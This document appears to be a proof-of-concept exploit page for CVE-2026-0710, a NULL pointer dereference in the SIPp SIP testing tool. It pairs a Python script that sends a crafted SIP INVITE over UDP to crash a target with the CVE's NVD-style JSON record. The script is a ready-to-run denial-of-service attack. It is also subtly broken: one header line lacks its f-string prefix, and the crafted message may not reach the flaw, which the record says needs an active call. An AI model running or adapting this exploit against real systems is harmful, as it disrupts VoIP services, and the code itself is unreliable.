CVE-2026-0710

#!/usr/bin/env python3 """ CVE-2026-0710 PoC - SIPp NULL Pointer Dereference Note: This PoC is for educational and authorized testing purposes only. Author: Based on vulnerability analysis """ import socket import sys import time def send_malicious_sip_message(target_ip, target_port, call_id): """ Send a specially crafted SIP INVITE message to trigger NULL pointer dereference in SIPp """ # Malicious SIP INVITE with malformed headers to trigger NULL pointer dereference malicious_invite = f"INVITE sip:target@{target_ip}:{target_port} SIP/2.0\r\n" malicious_invite += f"Via: SIP/2.0/UDP {target_ip}:{target_port};branch=z9hG4bK{call_id}\r\n" malicious_invite += "Max-Forwards: 70\r\n" malicious_invite += f"From: <sip:attacker@{target_ip}>;tag={call_id}\r\n" malicious_invite += f"To: <sip:target@{target_ip}>\r\n" malicious_invite += f"Call-ID: {call_id}@attacker\r\n" malicious_invite += "CSeq: 1 INVITE\r\n" malicious_invite += "Contact: <sip:attacker@{target_ip}>\r\n" # Malformed Content-Type and missing required headers malicious_invite += "Content-Type: application/sdp\r\n" malicious_invite += "Content-Length: 0\r\n" # Missing critical headers that may cause NULL pointer access malicious_invite += "\r\n" return malicious_invite.encode() def exploit_sipp_null_pointer(ip, port=5060): """ Exploit function to trigger CVE-2026-0710 in SIPp """ sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock.settimeout(5) call_id = f"exploit-{int(time.time())}" try: payload = send_malicious_sip_message(ip, port, call_id) print(f"[*] Sending malicious SIP message to {ip}:{port}") print(f"[*] Call-ID: {call_id}") sock.sendto(payload, (ip, port)) print("[+] Malicious message sent successfully") print("[*] If vulnerable, SIPp should crash with NULL pointer dereference") except Exception as e: print(f"[-] Error: {e}") finally: sock.close() if __name__ == "__main__": if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_ip> [port]") sys.exit(1) target_ip = sys.argv[1] target_port = int(sys.argv[2]) if len(sys.argv) > 2 else 5060 exploit_sipp_null_pointer(target_ip, target_port)

{"cve": {"id": "CVE-2026-0710", "sourceIdentifier": "[email protected]", "published": "2026-01-23T04:16:01.860", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in SIPp. A remote attacker could exploit this by sending specially crafted Session Initiation Protocol (SIP) messages during an active call. This vulnerability, a NULL pointer dereference, can cause the application to crash, leading to a denial of service. Under specific conditions, it may also allow an attacker to execute unauthorized code, compromising the system's integrity and availability."}, {"lang": "es", "value": "Se encontró una falla en SIPp. Un atacante remoto podría explotar esto enviando mensajes del Protocolo de Iniciación de Sesión (SIP) especialmente diseñados durante una llamada activa. Esta vulnerabilidad, una desreferencia de puntero NULL, puede provocar el bloqueo de la aplicación, lo que lleva a una denegación de servicio. Bajo condiciones específicas, también podría permitir a un atacante ejecutar código no autorizado, comprometiendo la integridad y disponibilidad del sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-476"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2026-0710", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2427788", "source": "[email protected]"}]}}